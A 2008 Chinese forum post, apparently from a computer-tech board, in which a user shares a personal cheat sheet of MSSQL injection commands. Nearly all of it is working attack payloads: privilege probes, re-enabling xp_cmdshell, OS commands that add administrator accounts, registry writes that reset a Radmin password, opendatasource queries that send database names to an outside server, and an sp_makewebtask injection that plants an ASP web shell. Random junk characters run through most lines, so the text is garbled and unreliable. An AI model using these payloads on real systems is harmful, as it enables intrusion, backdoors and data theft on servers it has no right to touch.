我爱电脑技术论坛 » 编程语言 » 常用的一些注入命令,方便查询

msppt 发表于 2008-6-16 20:53

常用的一些注入命令,方便查询

我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！
Hl&Uv@`] Q "m*D PSb&EK"^
//看看是什么权限的 'aA4tf-m0{m7rU)w
and 1=(Select IS_MEMBER(’db_owner’))
;a p y6sC(Sj.P And char(124)%2BCast(IS_MEMBER(’db_owner’) as varchar(1))%2Bchar(124)=1 ;--
WV.pw9vS-gQ ;o!@ Z{0\zK)?
//检测是否有读取某数据库的权限 E:I9f"[#i
and 1= (Select HAS_DBACCESS(’master’)) ZU4N:x&e
SA(H
And char(124)%2BCast(HAS_DBACCESS(’master’) as varchar(1))%2Bchar(124)=1 -- 6Fl5AyuW,O
g&c%[O)qT

3_;AC!Zh+gK5E}(x 数字类型 -mgC:q
nH$f
and char(124)%2Buser%2Bchar(124)=0 )G]/O&jRHZ

`kql"mMc"iAn1[ 字符类型
,Z3C'b8SU ’ and char(124)%2Buser%2Bchar(124)=0 and ’’=’
EP]~}4I5G
j#bjh.P-] 搜索类型
h4g!}Jc'Z$l:\ e ’ and char(124)%2Buser%2Bchar(124)=0 and ’%’=’
*V$pB!G/]y)E
d
`1c+rc/X v
n3k 爆用户名 E'Lg)f/A-K)FE-| L%}
and user>0
*KDQ ?Y@ ’ and user>0 and ’’=’
8NO8t,L]6C
*z/h-lv,V:KQ&U 检测是否为SA权限

B.EA.ZWL and 1=(select IS_SRVROLEMEMBER(’sysadmin’));-- 7o1m-a_8Ns7X.t F
RF
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
}3ysF:mLMM .Xv'fq/vMsU_6n
检测是不是MSSQL数据库 ,^E3?w!\
and exists (select * from sysobjects);--  ~
t_J8S s6g*Zd
+y.Q;P5jCQ3I#p
检测是否支持多行 H5un}do@
;declare @d int;--  
V1kO~aU(U{&M.o
q^dB`v 恢复 xp_cmdshell e lw,[s ~!m
;exec master..dbo.sp_addextendedproc ’xp_cmdshell’,’xplog70.dll’;--
2[ UJaZ @:?(N.D9m
y(ku0\$nbY8?LL
select * from openrowset(’sqloledb’,’server=192.168.1.200,1433;uid=test;pwd=pafpaf’,’select @@version’)  Nr
Ax(b*Ko

q6J'B(GVius //----------------------- +FX&W2s?'lJ5R
//      执行命令 8~
h9c-u,Zu3Mz"C
//-----------------------
*QZ5o!U.e!K6B;h*Y 首先开启沙盘模式： (B a@ in(Pr`_
exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 6Evr&r zN$r

;}~o#Z:r 然后利用jet.oledb执行系统命令
gi8l8~
n*Vj select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=c:\winnt\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user admin admin1234 /add")’)
*f$D3YMi+`5ab {&q0xG)]g'iy x4o`
执行命令
y&\V[i\1n6C;o ? f ;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add’;--
cW;}$Q
V4tI
;B5v2O,t"?q
EXEC [master].[dbo].[xp_cmdshell] ’cmd /c md c:\1111’
\m,y/l-j#IOl%lK:L[ )G2l K{4c hs,O&J
判断xp_cmdshell扩展存储过程是否存在：
C@x-l6S [url]http://192.168.1.5/display.asp?keyno=188[/url] and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = ’X’ AND name = ’xp_cmdshell’) .bn \ L$@ d

u eNP]brM5Iu
写注册表
G&k8d:QBs exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
P$D(VIXO)By$l G vM#Fo,F
REG_SZ
T4h&w+?u9~W 8x!h @)rL!C;x s
读注册表
_&e(ZZeql exec master..xp_regread ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon’,’Userinit’
TRv.^hU:?O9A'g
|Pc0@Z-xA 读取目录内容
2yj
I&E:wW/mvtwj exec master..xp_dirtree ’c:\winnt\system32\’,1,1
m1Bls1L+q4l H1P0euJ

a:Yq3T;A8w 数据库备份
*kW0C)i.N_J:P backup database pubs to disk = ’c:\123.bak’ w.NT?MA U
ez!|)vs/H)[S~
//爆出长度
Kr@vs@kKF+M And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- 5H/k.W3F*`

];`-H2M| jLM)E'i1t

8D4u3O;EG
OJ5F+H 更改sa口令方法：用sql综合利用工具连接后，执行命令： n_e7Y^^V'd
exec sp_password NULL,’新密码’,’sa’ NA~
r;h8c
nkS6dK9[o3]3H
添加和删除一个SA权限的用户test： /s^$q0E0_
exec master.dbo.sp_addlogin test,ptlove dE'W4__bGv Y!OV
exec master.dbo.sp_addsrvrolemember test,sysadmin DB;Grf.a%E

0C]B5Yij"m F}V 删除扩展存储过过程xp_cmdshell的语句:  
.e'qA;G\,k&}(y exec sp_dropextendedproc ’xp_cmdshell’
:}+xwQ;Zr&k jSA,kc n k0Y
添加扩展存储过过程
c"@Gj5OQ? EXEC [master]..sp_addextendedproc ’xp_proxiedadata’, ’c:\winnt\system32\sqllog.dll’  
7Y8U`x/V2Z_'o GRANT exec On xp_proxiedadata TO public  
@/e'f;\`4t7]'m
fzm3Fc$M@h` 3y$^&|p.q7E0me"g:N
停掉或激活某个服务。  
TZ#`E+Rk 2H!btYP'Lc
exec master..xp_servicecontrol ’stop’,’schedule’
w
EK%SH@Zj exec master..xp_servicecontrol ’start’,’schedule’ "}M,|4Gs Q1K B

?y%GE5^Ih dbo.xp_subdirs
5_p BZhZ9x H+A?hY 'DT:S7|
b
只列某个目录下的子目录。
3T8jP+it:EZ xp_getfiledetails ’C:\Inetpub\wwwroot\SQLInject\login.asp’
vJ"rd-].v@V.v!iy$_
K1h]3G
]2o`
^4H
dbo.xp_makecab
&D1X%J S0[N}
?.O"v:Qrkx-n 将目标多个档案压缩到某个目标档案之内。 8P}p&T1a3@ |w6C }
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
B\ |swT1X-h
DMv[1O\l o"ZB dbo.xp_makecab
qnp)cwE u6J ’c:\test.cab’,’mszip’,1, +f4T1@Zpp
’C:\Inetpub\wwwroot\SQLInject\login.asp’, vJ q:vl
’C:\Inetpub\wwwroot\SQLInject\securelogin.asp’ `v d} a

$nWQ(@!o4[7j*z@FC xp_terminate_process N `+bS8i(Cb

qL@l[r#R8s#`6U4` 停掉某个执行中的程序，但赋予的参数是 Process ID。 \$g,h,j'Y:c ?:E
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
4F1ZSC }d0d!x -}!e0G7b&Q"LP
xp_terminate_process 2484 )t v7`!d:S%V
:Th+ub)U
xp_unpackcab 0s})d?(?qQ

V(wz^Vz!PaL 解开压缩档。
%x!|9A,S#a-? ;D&? Z!?)Z9V?*s
xp_unpackcab ’c:\test.cab’,’c:\temp’,1
8i3CJ+\e2VR
"{|
dP9Y
@qs!zY.l6k i0o8_ 某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’Parameter’,’REG_BINARY’,0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite ’HKEY_LOCAL_MACHINE’,’SYSTEM\RAdmin\v2.0\Server\Parameters’,’port’,’REG_BINARY’,0xd20400 则端口值改为1234 Q(i7z|I b

m"Eu&S$dk I8N/}Nr3G7OvJ create database lcx; B.C$Xo4b&L?r?
Create TABLE ku(name nvarchar(256) null);
E)r y%Fv+ok Create TABLE biao(id int NULL,name nvarchar(256) null); ;wDA_5} `
y'ot `(p@e
//得到数据库名 GY*Fr:f
insert into opendatasource(’sqloledb’,’server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx’).lcx.dbo.ku select name from master.dbo.sysdatabases jtaW\J iu!j
}cuJ|
;nZU/q+a2f"|a/B
//在Master中创建表，看看权限怎样
nl8U5GR,c Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- PfUTu,G
3dL Z!_Z
KwN"B
用 sp_makewebtask直接在web目录里写入一句话马： ~9q/ND [/H@
[url]http://127.0.0.1/dblogin123.asp?username=123[/url]’;exec%20sp_makewebtask%20’d:\www\tt\88.asp’,’%20select%20’’<%25execute(request("a"))%25>’’%20’;-- $GY0U2R'd#u5y,EOR
K*K }5Huz1h
//更新表内容
v#G9^oU Update films SET kind = ’Dramatic’ Where id = 123 9FrG%D.a[r
6C+n#S9G,TNv
//删除内容 'RspO x-d d
delete from table_name where Stockid = 3

查看完整版本: 常用的一些注入命令,方便查询